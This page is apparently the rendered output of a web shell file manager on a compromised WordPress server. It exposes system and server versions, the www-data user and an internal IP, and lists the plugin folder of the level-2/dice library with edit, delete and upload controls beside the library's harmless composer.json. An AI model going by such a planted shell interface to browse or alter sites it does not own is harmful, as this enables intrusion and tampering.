[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
presto-player
/
vendor
/
level-2
/
dice
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 Extra
SET
[ DEL ]
📁 Loader
SET
[ DEL ]
📁 tests
SET
[ DEL ]
📄 .gitignore
22 B
SET
[ EDIT ]
|
[ DEL ]
📄 README.md
11,477 B
SET
[ EDIT ]
|
[ DEL ]
📄 composer.json
698 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: composer.json
{ "name": "level-2/dice", "description": "A minimalist Dependency injection container (DIC) for PHP. Please note: 3.0+ is only compatible with PHP 7.0. The 2.0 branch is compatbile with PHP 5.6.", "license": "BSD-2-Clause", "homepage": "http://r.je/dice.html", "keywords": ["Dependency injection", "ioc", "Dependency injection container", "DI"], "authors": [ { "name": "Tom Butler", "email": "tom@r.je" } ], "require": { "php": ">=7.0.0" }, "autoload": { "psr-4": { "Dice\\": "./" } }, "require-dev": { "phpunit/phpunit": "^6.5" }, "scripts": { "test": "phpunit" } }